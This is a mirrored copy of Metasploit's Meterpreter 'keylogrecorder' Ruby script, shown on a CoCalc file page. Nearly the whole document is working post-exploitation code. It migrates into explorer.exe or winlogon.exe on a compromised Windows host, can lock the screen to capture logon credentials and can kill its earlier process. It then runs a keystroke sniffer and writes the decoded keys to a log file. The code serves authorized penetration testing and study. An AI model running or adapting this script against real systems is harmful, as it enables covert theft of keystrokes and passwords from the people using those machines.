CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/scripts/meterpreter/keylogrecorder.rb
Views: 1904
##1# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.2# If you'd like to improve this script, please try to port it as a post3# module instead. Thank you.4##5678# Author: Carlos Perez at carlos_perez[at]darkoperator.com9# Updates by Shellster10#-------------------------------------------------------------------------------11session = client12# Script Options13@@exec_opts = Rex::Parser::Arguments.new(14"-h" => [ false, "Help menu." ],15"-t" => [ true, "Time interval in seconds between recollection of keystrokes, default 30 seconds." ],16"-c" => [ true, "Type of key capture. (0) for user key presses, (1) for winlogon credential capture, or (2) for no migration. Default is 2." ],17"-l" => [ false, "Lock screen when capturing Winlogon credentials."],18"-k" => [ false, "Kill old Process"]19)20def usage21print_line("Keylogger Recorder Meterpreter Script")22print_line("This script will start the Meterpreter Keylogger and save all keys")23print_line("in a log file for later analysis. To stop capture hit Ctrl-C")24print_line("Usage:" + @@exec_opts.usage)25raise Rex::Script::Completed26end272829#Get Hostname30host,port = session.session_host, session.session_port3132# Create Filename info to be appended to downloaded files33filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")3435# Create a directory for the logs36logs = ::File.join(Msf::Config.log_directory, 'scripts', 'keylogrecorder')3738# Create the log directory39::FileUtils.mkdir_p(logs)4041#logfile name42logfile = logs + ::File::Separator + host + filenameinfo + ".txt"4344#Interval for collecting Keystrokes in seconds45keytime = 304647#Type of capture48captype = 249# Function for locking the screen -- Thanks for the idea and API call Mubix50def lock_screen51print_status("Locking Screen...")52lock_info = client.railgun.user32.LockWorkStation()53if lock_info["GetLastError"] == 054print_status("Screen has been locked")55else56print_error("Screen lock Failed")57end58end59#Function to Migrate in to Explorer process to be able to interact with desktop60def explrmigrate(session,captype,lock,kill)61#begin62if captype.to_i == 063process2mig = "explorer.exe"64elsif captype.to_i == 165if is_uac_enabled?66print_error("UAC is enabled on this host! Winlogon migration will be blocked.")67raise Rex::Script::Completed68end69process2mig = "winlogon.exe"70if lock71lock_screen72end73else74process2mig = "explorer.exe"75end76# Actual migration77mypid = session.sys.process.getpid78session.sys.process.get_processes().each do |x|79if (process2mig.index(x['name'].downcase) and x['pid'] != mypid)80print_status("\t#{process2mig} Process found, migrating into #{x['pid']}")81session.core.migrate(x['pid'].to_i)82print_status("Migration Successful!!")8384if (kill)85begin86print_status("Killing old process")87client.sys.process.kill(mypid)88print_status("Old process killed.")89rescue90print_status("Failed to kill old process.")91end92end93end94end95return true96# rescue97# print_status("Failed to migrate process!")98# return false99# end100end101102#Function for starting the keylogger103def startkeylogger(session)104begin105#print_status("Grabbing Desktop Keyboard Input...")106#session.ui.grab_desktop107print_status("Starting the keystroke sniffer...")108session.ui.keyscan_start109return true110rescue111print_status("Failed to start Keylogging!")112return false113end114end115116def write_keylog_data session, logfile117data = session.ui.keyscan_dump118outp = ""119data.unpack("n*").each do |inp|120fl = (inp & 0xff00) >> 8121vk = (inp & 0xff)122kc = VirtualKeyCodes[vk]123124f_shift = fl & (1<<1)125f_ctrl = fl & (1<<2)126f_alt = fl & (1<<3)127128if(kc)129name = ((f_shift != 0 and kc.length > 1) ? kc[1] : kc[0])130case name131when /^.$/132outp << name133when /shift|click/i134when 'Space'135outp << " "136else137outp << " <#{name}> "138end139else140outp << " <0x%.2x> " % vk141end142end143144sleep(2)145146if(outp.length > 0)147file_local_write(logfile,"#{outp}\n")148end149end150151# Function for Collecting Capture152def keycap(session, keytime, logfile)153begin154rec = 1155#Creating DB for captured keystrokes156file_local_write(logfile,"")157158print_status("Keystrokes being saved in to #{logfile}")159#Inserting keystrokes every number of seconds specified160print_status("Recording ")161while rec == 1162#getting and writing Keystrokes163write_keylog_data session, logfile164165sleep(keytime.to_i)166end167rescue::Exception => e168print_status "Saving last few keystrokes"169write_keylog_data session, logfile170171print("\n")172print_status("#{e.class} #{e}")173print_status("Stopping keystroke sniffer...")174session.ui.keyscan_stop175end176end177178# Parsing of Options179180helpcall = 0181lock = false182kill = false183184@@exec_opts.parse(args) { |opt, idx, val|185case opt186when "-t"187keytime = val188when "-c"189captype = val190when "-h"191usage192when "-l"193lock = true194when "-k"195kill = true196end197}198if client.platform == 'windows'199if (captype.to_i == 2)200if startkeylogger(session)201keycap(session, keytime, logfile)202end203elsif explrmigrate(session,captype,lock, kill)204if startkeylogger(session)205keycap(session, keytime, logfile)206end207end208else209print_error("This version of Meterpreter is not supported with this Script!")210raise Rex::Script::Completed211end212213214